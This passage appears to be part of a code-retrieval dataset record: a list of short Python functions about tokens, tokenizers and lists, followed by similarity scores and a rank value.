"def get_read_tokens(mastertoken, config):\n mt_path = mastertoken['paths']['self']\n url = \"{}{}/read_tokens.json\".\\\n format(config['domain_base'], mt_path)\n\n try:\n resp = (api_call(url, 'get', config['debug']))\n tokens = resp.json()\n except ValueError as ex:\n abort(\"Unexpected response from packagecloud API: \"\n \"{}\".format(ex.message))\n\n return tokens['read_tokens']", "def tokens():\n pass", "def get_list_of_tokens(self, to_lower=True, remove_newlines=True):\n if not self.tokens:\n assert self.url, \"Wrong url provided!\"\n self.text = self._get_text(remove_newlines=remove_newlines)\n self.log.debug(u\"First 100 characters of text from {url}: {text}\"\n \"\".format(url=self.url,\n text=self.text[:100]))\n self.tokens = self._get_tokens()\n self.log.debug(u\"First 100 tokens of text from {url}: {tokens}\"\n \"\".format(url=self.url,\n tokens=self.tokens))\n if to_lower:\n # all words to lowercase\n self.tokens = list(map(lambda s: s.lower(), self.tokens))\n return self.tokens", "def getList(self):\n return self.list", "def tokens(self):\n return tuple(self._tree.getWords())", "def tokenize(self):\n tknzr = TweetTokenizer()\n tkn = []\n for tweet in self.tweets:\n for word in tknzr.tokenize(tweet):\n tkn.append(word)\n return tkn", "def getList(self):\n return self.list_", "def get_tokens(self, text):\n if text is not None:\n text = text.strip()\n words = self.safe_split(text)\n return words\n return []", "def get(self, filters=None, pagination=None, sort=None):\n filters = filters or {}\n if not is_user_action_allowed('manage_others_tokens'):\n filters['_user_fk'] = current_user.id\n\n sm = get_storage_manager()\n\n result = sm.list(models.Token, filters=filters,\n pagination=pagination, sort=sort)\n\n return result", "def keys(self):\n return list(self.token2id.values())", "def list(self):\n return self._get_list()", "def parse(self) -> List[List[Union[str,int]]]:\n return self.__create_list(cp(self.tokens))", "def get_tokens():\n return (ZEPPELIN_USER_KEY, UI_SSL_ENABLED, SECURITY_ENABLED_KEY, ZEPPELIN_KEYTAB_KEY, ZEPPELIN_PRINCIPAL_KEY,\n KERBEROS_EXECUTABLE_SEARCH_PATHS_KEY, ZEPPELIN_PORT_KEY, ZEPPELIN_PORT_SSL_KEY)", "def tokens(self):\n tokens = [k for k in self.tok2ind.keys()\n if k not in {'<NULL>', '<UNK>'}]\n return tokens", "def word_list(self) -> List[str]:\n return self._word_list", "def tokens_and_tags(self):\n return list(zip(self.tokens(), self.tags()))", "def token_lookup():\n token_list = {\".\": \"||Period||\",\n \",\": \"||Comma||\",\n '\"': \"|Quotation_Mark||\",\n \";\": \"||Semicolon||\",\n \"!\": \"||Exclamation_Mark||\",\n \"?\": \"||Question_Mark||\",\n \"(\": \"||Left_Parentheses||\",\n \")\": \"||Right_Parentheses||\",\n \"--\": \"||Dash||\",\n \"\\n\": \"||Return||\"\n }\n\n return token_list", "def get_read_tokens_dict(mastertoken, config):\n token_list = {}\n tokens = get_read_tokens(mastertoken, config)\n\n for token in tokens:\n if token['name']:\n token_list[token['name']] = token['value']\n if config['debug']:\n print(\"DEBUG: Found token {} with value {}\".\n format(token['name'], token['value']))\n\n return token_list", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "def get_components(self):\r\n return [Token.from_multiword(word, index, self) for index, word in enumerate(self.wordform.split('_'))]", "def getTokens(username):\n tokens = users.find({\"Username\": username})[0][\"Tokens\"]\n return tokens", "def get_list(key):\n ret = hookenv.action_get(key)\n return ret.split() if ret else []", "def get_tokens(self, node, include_extra=False):\n # type: (AstNode, bool) -> Iterator[Token]\n return self.token_range(node.first_token, node.last_token, include_extra=include_extra)", "def importantTokenList(self, ignoreSemanticTagList=[]):\n list = tokenlist.TokenList()\n for token in self.tokens:\n if token.isAcronym():\n expansion = token.getAcronymExpansion()\n \n# print token.text, '=', \n# for t in expansion:\n# print t.text,\n# print\n\n# list.append(token)\n# for t in token.getAcronymExpansion():\n# if self.isImportantToken(t):\n# list.append(t)\n\n if expansion == None or len(expansion) == 0:\n list.append(token)\n else:\n for t in token.getAcronymExpansion():\n if self.isImportantToken(t, ignoreSemanticTagList=ignoreSemanticTagList):\n list.append(t)\n elif self.isImportantToken(token, ignoreSemanticTagList=ignoreSemanticTagList):\n list.append(token)\n \n return list", "def __create_list(self, tokens : List[Union[str,int]]) -> List[List[Union[str,int]]]:\n if tokens:\n return [self.__add_instruction(cp(tokens[:1+syntaxParametersDict.get(tokens[0])]))] + self.__create_list(cp(tokens[1+syntaxParametersDict.get(tokens[0]):]))\n return []", "def get_symbols_list(self):\n return self.symbols_list", "def tokenize(cls, selector):\n\n cls.lexer.input(selector)\n token_list = []\n while True:\n token = cls.lexer.token()\n if not token: break\n token_list.append(token)\n return token_list", "def _list_tokens(self, user_id, tenant_id=None, trust_id=None,\n consumer_id=None):\n raise exception.NotImplemented() # pragma: no cover", "def listTags(self, authenticationToken):\r\n pass", "def tokens(self):\n data, end = \\\n self.pat.traverse(lambda obj, *args: obj.tokens(*args),\n self.begin, self.data)\n return data", "def get_nft_list(self):\n tokens = self.api.find_all(\"nft\", \"nfts\", query={})\n return tokens", "def parse_token_list(data):\n\n state = http_header_util.ParsingState(data)\n\n token_list = []\n\n while True:\n token = http_header_util.consume_token(state)\n if token is not None:\n token_list.append(token)\n\n http_header_util.consume_lwses(state)\n\n if http_header_util.peek(state) is None:\n break\n\n if not http_header_util.consume_string(state, ','):\n raise HandshakeException(\n 'Expected a comma but found %r' % http_header_util.peek(state))\n\n http_header_util.consume_lwses(state)\n\n if len(token_list) == 0:\n raise HandshakeException('No valid token found')\n\n return token_list", "def _next_tokens(self, head):\n state = head.state\n input_str = self.input_str\n position = head.position\n actions = state.actions\n in_len = len(input_str)\n tokens = []\n\n # add special STOP token if they are applicable\n if STOP in actions:\n if not self.consume_input \\\n or (self.consume_input and position == in_len):\n tokens.append(STOP_token)\n\n if position < in_len:\n # Get tokens by trying recognizers - but only if we are not at\n # the end, because token cannot be empty\n if self.custom_token_recognition:\n def get_tokens():\n return self._token_recognition(head)\n\n custom_tokens = self.custom_token_recognition(\n head, get_tokens,\n )\n if custom_tokens is not None:\n tokens.extend(custom_tokens)\n else:\n tokens.extend(self._token_recognition(head))\n\n # do lexical disambiguation if it is enabled\n if self.lexical_disambiguation:\n tokens = self._lexical_disambiguation(tokens)\n\n return tokens", "def getList(self):\n\treturn self.sorted_list.getList()", "def _next_tokens(self, context):\n state = context.state\n input_str = context.input_str\n position = context.position\n actions = state.actions\n in_len = len(input_str)\n tokens = []\n\n # add special tokens (EMPTY and STOP) if they are applicable\n if EMPTY in actions:\n tokens.append(EMPTY_token)\n if STOP in actions:\n if not self.consume_input \\\n or (self.consume_input and position == in_len):\n tokens.append(STOP_token)\n\n if position < in_len:\n # Get tokens by trying recognizers - but only if we are not at\n # the end, because token cannot be empty\n if self.custom_token_recognition:\n def get_tokens():\n return self._token_recognition(context)\n\n custom_tokens = self.custom_token_recognition(\n context, get_tokens,\n )\n if custom_tokens is not None:\n tokens.extend(custom_tokens)\n else:\n tokens.extend(self._token_recognition(context))\n\n # do lexical disambiguation if it is enabled\n if self.lexical_disambiguation:\n tokens = self._lexical_disambiguation(context, tokens)\n\n return tokens", "def tokenize(self, texts: List[str]) -> List[Token]:\n raise NotImplementedError", "def get_gene_tokens(self, classification: Classification) -> List[GeneToken]:\n return self.get_protein_gene_symbol_tokens(classification)", "def _list_known_secret_tokens():\n global _secret_token_map\n\n keys = list(_secret_token_map.keys())\n keys.sort()\n\n ret = ''\n for key in keys:\n if ret != '':\n ret += ', '\n ret += \"'\" + key + \"'\"\n return ret", "def tokenize(self):\n tokens = []\n while not self.eos():\n\n # Try to match a new token\n token = None\n candidates = [self.number, self.character_constant, self.string_constant,\n self.identifier, self.operator, self.punctuator]\n for f in candidates:\n col = self.pos\n try:\n self.whitespace()\n token = f()\n self.prev_white = False\n tokens.append(token)\n break\n except TokenError:\n self.pos = col\n\n # Only continue matching if a token was found\n if token is None:\n break\n\n self.whitespace()\n if not self.eos():\n raise TokenError(\"Encountered invalid token.\")\n\n return tokens", "def _get_tokens(s: str) ->List[str]:\n return [] if not s else _normalize_text(s).split()", "def list():", "def list():", "def getWordsList(self):\n return self.words", "def list(self):\n return self.request(\"GET\")", "def list(self) -> typing.List[str]:\n pass", "def access_token(self):\n social_auth = self.social_auth.get()\n return social_auth.tokens", "def token(self):\n print(\"getter of token called\")\n return self._token", "def _get_all_possible_tokens_ahead(self, context):\n tokens = []\n if context.position < len(context.input_str):\n for terminal in self.grammar.terminals.values():\n try:\n tok = terminal.recognizer(context.input_str,\n context.position)\n except TypeError:\n tok = terminal.recognizer(context, context.input_str,\n context.position)\n additional_data = ()\n if type(tok) is tuple:\n tok, *additional_data = tok\n if tok:\n tokens.append(Token(terminal, tok, context.position,\n additional_data))\n return tokens", "def _find_all_tokens(self) -> [str]:\n return re.findall(\"[a-zA-Z\\d]+\", self.soup.get_text(separator=\" \", strip=True))", "def _get_all_possible_tokens_ahead(self, context):\n tokens = []\n if context.position < len(context.input_str):\n for terminal in self.grammar.terminals.values():\n try:\n tok = terminal.recognizer(context.input_str,\n context.position)\n except TypeError:\n tok = terminal.recognizer(context, context.input_str,\n context.position)\n additional_data = ()\n if type(tok) is tuple:\n tok, *additional_data = tok\n if tok:\n tokens.append(Token(terminal, tok, additional_data))\n return tokens", "def getList(self):\n return self.sorted_list.getList()", "def get_lists(self):\n return [{\"id\": lst[\"list_id\"], \"name\": lst[\"name\"]}\n for lst in List.objects(user_id=self.user_id, active=True)]", "def multiword_tokens(self):\n return self._mwts", "def control_bus_tokens(self):\n if self.lliagraph:\n return self.lliagraph.control_bus_tokens.items()\n else:\n return []", "def _parse_individual_tokens(self, tokens: List[str]) -> List:\r\n objs = []\r\n\r\n for token in tokens:\r\n obj = self._parse_token(token)\r\n objs.append(obj)\r\n\r\n return objs", "def get_tokens():\n return (AMS_MONITOR_PID_DIR,)" ]
[ "0.83647424", "0.80425704", "0.79461306", "0.79414326", "0.78283435", "0.75734204", "0.75067395", "0.7500921", "0.7500921", "0.7500921", "0.74711776", "0.74703306", "0.73524517", "0.72486407", "0.7219096", "0.7147502", "0.7132472", "0.7059246", "0.6929604", "0.69008", "0.68774545", "0.686128", "0.68404263", "0.6840318", "0.6819085", "0.67348593", "0.6730855", "0.67276204", "0.66702497", "0.66494155", "0.6629424", "0.6583703", "0.6573836", "0.6543659", "0.6498906", "0.6485851", "0.6470962", "0.6457", "0.64515626", "0.6442808", "0.6425382", "0.63887453", "0.6386064", "0.6385717", "0.6385717", "0.6379771", "0.6358245", "0.63545257", "0.63518584", "0.63429683", "0.63183314", "0.6314165", "0.6299709", "0.62857884", "0.62638175", "0.62050277", "0.61972135", "0.61802936", "0.6138678", "0.61276966", "0.6107711", "0.60978097", "0.6094398", "0.6072132", "0.60652035", "0.6059414", "0.60503453", "0.6047183", "0.6046054", "0.60413086", "0.60388184", "0.6032984", "0.6025284", "0.60188574", "0.60180384", "0.60169125", "0.5992728", "0.5977007", "0.5970087", "0.5955897", "0.59460896", "0.59249353", "0.59140575", "0.58983827", "0.58982646", "0.58917004", "0.58917004", "0.5873252", "0.5866376", "0.58663315", "0.5858681", "0.5853012", "0.5843518", "0.58341515", "0.58270955", "0.58259135", "0.5824618", "0.5824196", "0.5820515", "0.58200955", "0.5818195" ]
0.0
-1
Convert `document` into the bagofwords (BoW) format = list of `(token_id, token_count)` tuples.
def doc2bow(self, document, allow_update=False, return_missing=False): doc=[t.text for t in document.tokens] if isinstance(doc, string_types): raise TypeError("doc2bow expects an array of unicode tokens on input, not a single string") # Construct (word, frequency) mapping. counter = defaultdict(int) for w in doc: counter[w if isinstance(w, str) else str(w, 'utf-8')] += 1 token2id = self.token2id if allow_update or return_missing: missing = sorted(x for x in iteritems(counter) if x[0] not in token2id) if allow_update: for w, _ in missing: # new id = number of ids made so far; # NOTE this assumes there are no gaps in the id sequence! token2id[w] = len(token2id) result = {token2id[w]: freq for w, freq in iteritems(counter) if w in token2id} if allow_update: self.num_docs += 1 self.num_pos += sum(itervalues(counter)) self.num_nnz += len(result) # keep track of document and collection frequencies for tokenid, freq in iteritems(result): self.cfs[tokenid] = self.cfs.get(tokenid, 0) + freq self.dfs[tokenid] = self.dfs.get(tokenid, 0) + 1 # return tokenids, in ascending id order result = sorted(iteritems(result)) if return_missing: return result, dict(missing) else: return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_bag_words(document_tokenized):\n bag_words = dict()\n for token in document_tokenized:\n if token in bag_words.keys():\n bag_words[token] += 1\n else:\n bag_words[token] = 1\n return bag_words", "def sentencesToBow(documents):\n bowSentences = []\n dictionary = Dictionary(documents)\n\n numDocs = len(documents);\n avgDocLength = sum(map(len, documents))/numDocs\n for document in documents:\n bowSentence = []\n docLength = len(document)\n bowDoc = dictionary.doc2bow(document)\n for bowTerm in bowDoc:\n\n docTermFreq = bowTerm[1]\n termDocFreq = dictionary.dfs[bowTerm[0]]\n\n termWeight = docTermWeight(docTermFreq, termDocFreq, docLength, avgDocLength, numDocs, k=5, b=0.1)\n newBowTerm = (bowTerm[0], termWeight)\n bowSentence.append(newBowTerm)\n\n bowSentences.append(bowSentence)\n\n return bowSentences, dictionary", "def word_frequency(self, document):\n freq_table = {}\n words = nltk.word_tokenize(document)\n for word in words:\n if word in freq_table:\n freq_table[word] = freq_table.get(word) + 1\n else:\n freq_table[word] = 1\n # cut down the frequency table so that only common words are scored for\n freq_table = sorted(freq_table.items(), key=lambda x: x[1], reverse=True)\n scorable_words = []\n for word, occ in freq_table:\n # set threshold as words appearing x times or more - set to optimal valeue = 0\n # in hindsight this can just be deleted\n if int(occ) > 0:\n scorable_words.append(word)\n else:\n break\n self.sent_pos = self.sent_pos + 1 \n return scorable_words", "def gen_bag_of_words_df(self):\n\t\tdef word_vector(doc_text):\n\t\t\tfreqs = pd.Series(collections.Counter(doc_text.split()))\n\t\t\treturn freqs.loc[set(freqs.index.values)|set(self.stems)]\n\t\tself.bagofwords = self.dataframe.text.apply(word_vector).replace({np.nan:0})", "def bow_vec(doc):\n return CECTORIZER.transform([doc]).toarray()", "def bag_of_words(tokenized_sentence, all_words):\n\n tokenized_sentence = [stem(w) for w in tokenized_sentence]\n #print(tokenized_sentence)\n bag = np.zeros_like(all_words, dtype=np.float32)\n for idx, w in enumerate(all_words):\n if w in tokenized_sentence:\n bag[idx] = 1.0\n\n return bag", "def add_doc(self, document):\n # Split document up into list of strings\n #words = self.tokenize(document)\n words = document\n # Count word frequencies in this document\n word_counts = {}\n for word in words:\n word_counts[word] = word_counts.get(word, 0) + 1\n # Add word counts as new row to sparse matrix\n self.sparse.append(word_counts)\n # Add to total document count for each word\n for word in word_counts:\n self.doc_count[word] = self.doc_count.get(word, 0) + 1", "def tokenize(document):\n token = nltk.word_tokenize(document)\n\n output = [word.lower() for word in token if (word not in string.punctuation and word not in nltk.corpus.stopwords.words(\"english\"))]\n\n return output", "def bow(tokens):\n return dict(collections.Counter(re.findall(r'\\w+', \" \".join(tokens))))", "def tokenize(document):\n\n # Unable to acquire 'stopwords' without these snippets due to my python config\n # import ssl\n # ssl._create_default_https_context = ssl._create_unverified_context\n # nltk.download('stopwords')\n\n stops = nltk.corpus.stopwords.words(\"english\")\n\n all_words = list()\n cleaned_words = list()\n\n all_words = nltk.word_tokenize(document)\n\n for word in all_words:\n word = word.strip()\n word = word.lower()\n\n if word in stops \\\n or not word \\\n or word in string.punctuation \\\n or word.strip(\"=\") != word:\n continue\n else:\n cleaned_words.append(word)\n\n return cleaned_words", "def featurize(self, data):\n \n bag_of_words = []\n\n tokens = data.split()\n\n for i in tokens:\n bag_of_words.append((i, True))\n\n return bag_of_words", "def preproc_doc(document):\n tokenizer = tokenization.FullTokenizer(\n vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n\n # document = [\n # tokenization.convert_to_unicode(\n # unidecode.unidecode(line.decode(\"utf-8\"))) for line in document\n # ]\n\n sent_tokens = [tokenizer.tokenize(sent) for sent in document if sent]\n sent_tokens = [sent for sent in sent_tokens if len(sent) > 1]\n if len(sent_tokens) < 8:\n return []\n\n # Convert token lists into ids and add any needed tokens and padding for BERT\n tf_example = convert_instance_to_tf_example(tokenizer, sent_tokens,\n FLAGS.max_sent_length,\n FLAGS.max_para_length)\n\n # Serialize TFExample for writing to file.\n tf_examples = [tf_example.SerializeToString()]\n\n return tf_examples", "def bagOfWords(self):\n if self._bow is None:\n self._bow = {}\n for word in self._words:\n if word['word'] in self._bow:\n self._bow[word['word']] += 1\n else:\n self._bow[word['word']] = 1\n return self._bow", "def get_tokenizer_result(blob):\n return list(blob.words)", "def gen_words(self, doc):\n pattern = re.compile(u'[\\\\s\\\\d,.<>/?:;\\'\\\"[\\\\]{}()\\\\|~!@#$%^&*\\\\-_=+a-zA-Z,。《》、?:;“”‘’{}【】()…¥!—┄-]+')\n doc = re.sub(pattern, ' ', doc)\n suffix_indexes = index_of_sorted_suffix(doc, self.max_word_len)\n word_cands = {}\n # compute frequency and neighbors\n for suf in suffix_indexes:\n word = doc[suf[0]:suf[1]]\n if word not in word_cands:\n word_cands[word] = WordInfo(word)\n word_cands[word].update(doc[suf[0] - 1:suf[0]], doc[suf[1]:suf[1] + 1])\n # compute probability and entropy\n length = len(doc)\n for k in word_cands:\n word_cands[k].compute(length)\n word_cands[k].compute_pp(self.pos_prop)\n # compute aggregation of words whose length > 1\n values = sorted(word_cands.values(), key=lambda x: len(x.text))\n for v in values:\n if len(v.text) == 1:\n continue\n v.compute_cohesion(word_cands)\n\n return sorted(values, key=lambda v: v.freq, reverse=True)", "def tokenize(document):\n words = [word.lower() for word in nltk.word_tokenize(document) if word not in string.punctuation and word not in nltk.corpus.stopwords.words(\"english\") ]\n\n return sorted(words)", "def convert_word_to_count(counter={}, doc=[]):\n for sentence in doc:\n for word in sentence.split():\n if word not in counter:\n counter[word] = 1\n else:\n counter[word] += 1\n return counter", "def make_word_to_freq(self):\n\t\tword_to_freq = {}\n\t\tdocuments = self.tokenized_documents[\"train\"]\n\t\tfor document in documents:\n\t\t\tfor word in document:\n\t\t\t\tif not word in self.worddict: # make sure we have not found one of the pre-defined words\n\t\t\t\t\tword_to_freq[word] = word_to_freq.get(word, 0) + 1\n\t\t\n\t\treturn word_to_freq", "def tokenize(document):\n\n # Initialize the list of words, punctuation and stopwords\n keywords = []\n punctuations_list = string.punctuation\n stopwords_list = nltk.corpus.stopwords.words(\"english\")\n\n # Make a naive tokenized copy of the `document`\n naive_list = nltk.word_tokenize(document)\n\n for item in naive_list:\n\n # Ignore punctuations or stopwords\n if (item in punctuations_list) or (item in stopwords_list) or (len(item) < 4):\n continue\n\n # Add document by coverting all words to lowercase\n keywords.append(item.lower())\n\n return keywords", "def freq(word, document):\n return document.split(None).count(word)", "def getReviewsWithToken(self, token):\n\n wordid = self.find_word_in_dictionary(token)\n # word is not in the dictionary\n if wordid == -1:\n print(\"Token is not in the dictionary\")\n return 0\n\n with open(self.doc_to_words_path, 'rb') as bin:\n tup = []\n while bin.tell() != os.fstat(bin.fileno()).st_size:\n # get wordid:\n docid_in_file = int.from_bytes(bin.read(4), 'big')\n # get frequency:\n frequency = int.from_bytes(bin.read(4), 'big')\n # count words:\n count = 0\n for i in range(frequency):\n wordid_in_file = int.from_bytes(bin.read(4), 'big')\n if wordid == wordid_in_file:\n count += 1\n tup.append(docid_in_file)\n tup.append(count)\n return tuple(tup)", "def bagOfWords(self,phrase):\n return self._support.bagOfWords(phrase)", "def get_vocab(self):\n word2id = {}\n for document in self.docs:\n for word in document:\n if word not in word2id.keys():\n word2id[word] = len(word2id)\n return word2id", "def get_doc(corpus):\n doc_info = []\n\n for idx, text in enumerate(corpus):\n count = len(word_tokenize(text))\n doc_info.append({'doc_length': count})\n\n return doc_info", "def vectorize_doc(document):\n # return document vector for tokenized input doc\n return bc.encode([document])[0]", "def tokenize(document):\n import string\n\n # tokenize the given document\n words = nltk.tokenize.word_tokenize(document)\n words = [word.lower() for word in words]\n\n # filter words from punctuations and stopwords\n loop_words = words.copy()\n for word in loop_words:\n if word in [char for char in string.punctuation] + nltk.corpus.stopwords.words(\"english\"):\n words.remove(word)\n\n return words", "def vocabulary(corpus_tokenized):\n vocab = list()\n for element in corpus_tokenized:\n document = element['document']\n for word in document:\n if word not in vocab:\n vocab.append(word)\n return vocab", "def num_bigram(doc):\n matched_spans = []\n matches = matcher(doc)\n for match_id, start, end in matches:\n span = doc[start:end]\n matched_spans.append(span)\n for span in matched_spans: # merge into one token after collecting all matches\n span.merge()\n return doc", "def doc2vec(self, doc):\n contained_words = self.cut_words(doc)\n vec = []\n for wrd in self.words:\n tf = contained_words.count(wrd) / len(contained_words)\n df = self.dfdict[wrd] + 1\n if wrd in contained_words: df += 1\n idf = log10((len(self.docs) + 1) / df)\n vec.append(tf * idf)\n return vec", "def wordCount(document):\n return float(len(document.split(None)))", "def corpus2mallet(self, corpus, file_like):\n for docno, doc in enumerate(corpus):\n if self.id2word:\n tokens = chain.from_iterable([self.id2word[tokenid]] * int(cnt) for tokenid, cnt in doc)\n else:\n tokens = chain.from_iterable([str(tokenid)] * int(cnt) for tokenid, cnt in doc)\n file_like.write(utils.to_utf8(\"%s 0 %s\\n\" % (docno, ' '.join(tokens))))", "def tokenize_into_words(myblob):\n set_constraint = re.compile(r'[^a-zA-Z0-9]')\n tokenize_to_text = set_constraint.split(myblob) # The blob is spilt into words and the given constraints are applied\n words = [word for word in tokenize_to_text if word]\n return words", "def tokenize_and_split_bis(sms_file):\n \n dic = {}\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n i = -1\n document = 0\n terms = 0\n new_document = True\n ham = True\n for line in open(sms_file, 'r').readlines():\n w = []\n document += 1\n new_document = True\n for word in line.split():\n i = i + 1\n if word == \"ham\":\n ham = True\n i = i - 1\n elif word == \"spam\":\n ham = False\n i = i - 1\n else:\n if word not in dic:\n dic[word] = i\n w.append(dic[word])\n list3.append(1)\n list4.append(1)\n new_document = False\n terms += 1\n else : \n i = i - 1\n w.append(dic[word])\n list4[dic[word]] += 1\n terms += 1\n if new_document: \n list3[dic[word]] += 1\n new_document = False\n \n if ham and w !=[]:\n list2.append(w)\n elif ham == False and w !=[]:\n list1.append(w)\n\n moy = 0\n len_dic = len(dic.keys())\n list5 = [0 for x in range(len_dic)]\n for key in dic.keys():\n if list4[dic[key]] > 0:\n tf = list4[dic[key]] / terms\n idf = math.log(document / list3[dic[key]])\n tfIdf = tf * idf\n list5[dic[key]] = tfIdf\n # print(\"the word \" + str(key) + \" appairs \" + str(list4[dic[key]]) + \" times.\")\n # print(\"his frequency is \" + str(list4[dic[key]] / terms) )\n # print(\"the word \" + str(key) + \" appairs \" + str(list3[dic[key]]) + \" times in each document.\")\n # print(\"his frequency is \" + str(idf))\n # print(\"utility \" + str(tfIdf))\n moy += tfIdf\n \n moy = moy / len_dic \n # print(moy)\n dic_bis = {}\n i = -1\n for key in dic.keys():\n value = list5[dic[key]]\n # print(str(value))\n if (value > oracle * moy):\n i += 1\n dic_bis[key] = i\n # else:\n # print(\"not pass \" + key + \" \" + str(value))\n \n \n # print(dic_bis == dic)\n # print(dic)\n return dic_bis,list1,list2", "def bag_of_words(batch, TEXT):\n V = len(TEXT.vocab)\n X = torch.zeros(batch.text.size(0), V)\n ones = torch.ones(batch.text.size(1))\n for b in range(batch.text.size(0)):\n X[b].index_add_(0, batch.text.data[b], ones)\n X[b][TEXT.vocab.stoi['<pad>']] = 0\n X = Variable(X, requires_grad=False)\n return X", "def extract_terms(document):\n tokens = word_tokenize(document)\n stemmer = PorterStemmer()\n terms = {} # Dictionary {term: appearances}\n word_count = 0 # To return total (meaningful) word count\n for token in tokens:\n token = token.lower() # Lowercase\n token = token.strip(string.punctuation) # Remove punctuation\n if token and token not in stopwords.words(\"english\"): # Remove stopwords\n token = stemmer.stem(token) # Using Porter Stemmer\n if token not in terms:\n terms[token] = 1\n else:\n terms[token] += 1\n word_count += 1\n return terms, word_count", "def get_words_with_nplus_frequency(tokenized_sentences, count_threshold):\r\n\r\n closed_vocab = []\r\n \r\n\r\n word_counts = count_words(tokenized_sentences)\r\n \r\n\r\n for word, cnt in word_counts.items(): # complete this line\r\n \r\n\r\n if cnt >= count_threshold:\r\n \r\n # append the word to the list\r\n closed_vocab.append(word)\r\n \r\n return closed_vocab", "def tokenize(document):\n words = nltk.word_tokenize(document)\n # tokenize files into a list of words\n return [\n word.lower() for word in words\n # filter out all punctuation (import string) and all stopwords\n if not all(char in string.punctuation for char in word) \n and word not in nltk.corpus.stopwords.words(\"english\")\n ]", "def bag_of_features(self, word, normalize=True):\n word_features = self.word_fts(word, normalize)\n features = [v + f for f in self.names for v in ['+', '0', '-']]\n bag = collections.OrderedDict()\n for f in features:\n bag[f] = 0\n vdict = {-1: '-', 0: '0', 1: '+'}\n for w in word_features:\n for (f, v) in w.items():\n bag[vdict[v] + f] += 1\n return numpy.array(list(bag.values()))", "def word_count(self, document):\n start_time = time.time()\n dictionary = dict()\n counter = defaultdict(int)\n for line in document.splitlines():\n for word in line.split():\n if word not in PUNCTUATION_MARK:\n counter[word] += 1\n for word, cnt in sorted(counter.items(), key=lambda x: (-x[1], x[0])):\n dictionary[word] = cnt\n self.log.info(\"Duration count dictionary: {duration}\".format(duration=float(time.time() - start_time)))\n return dictionary", "def countFreq(self,document):\n self.document = document\n vocab=['python','js','android','php','django','javascript','oracle','ruby','rails','java']\n cnt_vector = CountVectorizer(vocabulary=vocab)\n self.freq_term_matrix = cnt_vector.fit_transform(self.document)\n return self.freq_term_matrix.toarray()", "def tokenize(document):\n raw_words=[word.lower() for word in nltk.word_tokenize(document) if word.isalpha()]\n raw_words=[word.lower() for word in raw_words]\n final_words=[]\n for word in raw_words:\n if word not in string.punctuation and word not in nltk.corpus.stopwords.words(\"english\"):\n final_words.append(word.lower())\n return final_words", "def word_frequency(book):\n unique_dict = unique_words(book)\n\n word_array = pd.DataFrame(list(unique_dict.items()), columns=['Word', 'Occurence'])\n\n return word_array", "def document_to_lda_features(lda_model, document):\n topic_importances = lda_model.get_document_topics(document, minimum_probability=0)\n topic_importances = numpy.array(topic_importances)\n return topic_importances[:,1]", "def parse_doc(doc,vocab):\n doc=doc.lower()\n doc=re.sub(r'-',' ',doc)\n doc=re.sub(r' +',' ',doc) # turn multiple spaces into a single space\n doc=re.sub(r'[^a-z ]','',doc) # remove anything that is not a-z or space\n words=doc.split()\n word_vocab=[vocab.get(word,-1) for word in words]\n words_dict=collections.Counter(word_vocab)\n del words_dict[-1] # ignore the words outside the vocabulary\n #wordid=words_dict.keys()\n #wordcnt=words_dict.values()\n return sorted(words_dict.items())", "def extract(self, document):\n f_num = len(self.feature_list)\n feature_vector = np.zeros((f_num,))\n words = document.split()\n for i in xrange(len(words)):\n for n in self.ns:\n ngram = self.try_get_ngram(words, n, i)\n if ngram and ngram in self.ngrams:\n self.add_ngram(feature_vector, ngram)\n return feature_vector", "def tokenize(document):\n nltk.download('punkt')\n nltk.download('stopwords')\n wordList = nltk.word_tokenize(document.lower())\n punctuation = string.punctuation\n stopWords = nltk.corpus.stopwords.words(\"english\")\n listCopy = copy.deepcopy(wordList)\n for w in listCopy:\n if w in stopWords or w in punctuation:\n newList = list(filter(w.__ne__, wordList))\n wordList = newList\n return wordList", "def count_words_sents(self, doc_array):\n total_num_sents = []\n total_num_words = []\n for doc in doc_array:\n sents = sent_tokenize(doc)\n total_num_sents.append(len(sents))\n temp_num_words = []\n for sent in sents:\n num_words = word_tokenize(sent)\n temp_num_words.append(len(num_words))\n total_num_words.append(temp_num_words)\n return np.array(total_num_sents), np.array(total_num_words)", "def bag_of_words_model(features, target):\n target = tf.one_hot(target, 2, 1, 0)\n features = tf.contrib.layers.bow_encoder(\n features, vocab_size=n_words, embed_dim=Embedding_size, scope=\"input_layer\")\n hidden_layer1 = tf.contrib.layers.fully_connected(features, 100, scope=\"hidden_layer1\")\n logits = tf.contrib.layers.fully_connected(hidden_layer1, 2, scope=\"output_layer\",\n activation_fn=None)\n loss = tf.contrib.losses.softmax_cross_entropy(logits, target)\n train_op = tf.contrib.layers.optimize_loss(\n loss, tf.contrib.framework.get_global_step(),\n optimizer='Adam', learning_rate=0.01)\n return (\n {'class': tf.argmax(logits, 1),\n 'prob': tf.nn.softmax(logits)},\n loss, train_op)", "def get_vocabulary(documents):\n cv_model = CountVectorizer(binary=True)\n cv_model.fit(documents)\n\n vocabulary = cv_model.get_feature_names()\n vocabulary = list(map(str, vocabulary))\n\n return vocabulary", "def get_word_frequency(self, word, document):\n return self.dictionary[word]['docs'][document]", "def get_number_of_words_in_document(self, document):\n for _set in self.sets:\n if document in _set:\n return self.sets[_set][document]['number_of_words']", "def tfidf_bow(doc):\n\n if VECTORIZER == None:\n sys.stderr.write(\"ERROR: Vectorizer not defined... Did you call set_vocab?\\n\")\n return None\n return VECTORIZER.transform([doc]).toarray()", "def lookup_bm25(self) -> list:\n prox_by_doc = {}\n for token in self._tokenizer.tokenize(self._query):\n for token_info in self._index.get_token_search(token):\n doc = token_info.doc\n if doc not in prox_by_doc:\n prox_by_doc[doc] = 0\n prox_by_doc[doc] += token_info.weight\n\n return sorted(prox_by_doc.items(), key=lambda t: t[1], reverse=True)", "def doc2features(self,sent):\n return [self.word2features(sent['tokens'], i) for i in range(len(sent['tokens']))]", "def word_occurrences(corpus):\n occur_array = []\n\n for e in corpus:\n occur = Counter(e)\n occur_array.append(occur)\n\n return occur_array", "def mapWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n return token_map", "def create_bow(vocab, filepath):\n bow = {}\n # TODO: add your code here\n wordcount = 0\n wordcountnone = 0\n c = 0\n\n for i in vocab:\n c+=1\n with open(filepath, 'r', encoding=\"utf-8\") as 